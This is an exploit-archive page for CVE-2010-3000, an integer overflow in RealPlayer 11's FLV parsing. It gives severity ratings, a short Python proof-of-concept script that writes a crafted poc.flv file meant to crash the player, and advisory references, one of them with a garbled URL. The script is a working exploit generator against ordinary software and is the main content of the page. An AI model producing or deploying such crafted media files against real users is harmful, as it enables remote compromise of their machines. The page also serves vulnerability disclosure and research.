RealPlayer 11 FLV Parsing Integer Overflow

2010.09.14

Credit: Abysssec

Risk: High

Local: No

Remote: Yes

CVE: CVE-2010-3000

CWE: CWE-189

CVSS Base Score: 9.3/10

Impact Subscore: 10/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: Complete

Integrity impact: Complete

Availability impact: Complete

# POC for CVE-2010-3000
# http://www.exploit-db.com/moaub-13-realplayer-flv-parsing-multiple-integer-overflow/
# http://www.exploit-db.com/sploits/moaub-13-exploit.zip 

import sys

def main():

	flvHeader = '\x46\x4C\x56\x01\x05\x00\x00\x00\x09'
	flvBody1 = '\x00\x00\x00\x00\x12\x00\x00\x15\x00\x00\x00\x00\x00\x00\x00\x02\x00\x0A\x6F\x6E\x4D\x65\x74\x61\x44\x61\x74\x61\x08'
	HX_FLV_META_AMF_TYPE_MIXEDARRAY_Value = "\x07\x50\x75\x08"   #  if value >= 0x7507508   --> crash
	flvBody2  = "\x00\x00\x09\x00\x00\x00\x20"
	
	flv = open('poc.flv', 'wb+')
	flv.write(flvHeader)
	flv.write(flvBody1)
	flv.write(HX_FLV_META_AMF_TYPE_MIXEDARRAY_Value)
	flv.write(flvBody2)
	
	flv.close()
	print '[-] FLV file generated'
	
if __name__ == '__main__':
    main()

References:

http://xforce.iss.net/xforce/xfdb/61423

http://www.zerodayinitiative.com/advisories/ZDI-10-167

http://www.vupen.com/english/advisories/2010/2216

http://www.securitytracker.com/id?1024370

http://www.securityfocus.com/archive/1/archive/1/513383/100/0/threaded

http://service.real.com/realplayer/security/08262010_player/en/

http2000://secunia.com/advisories/41154

http://secunia.com/advisories/41096

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

RealPlayer 11 FLV Parsing Integer Overflow

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.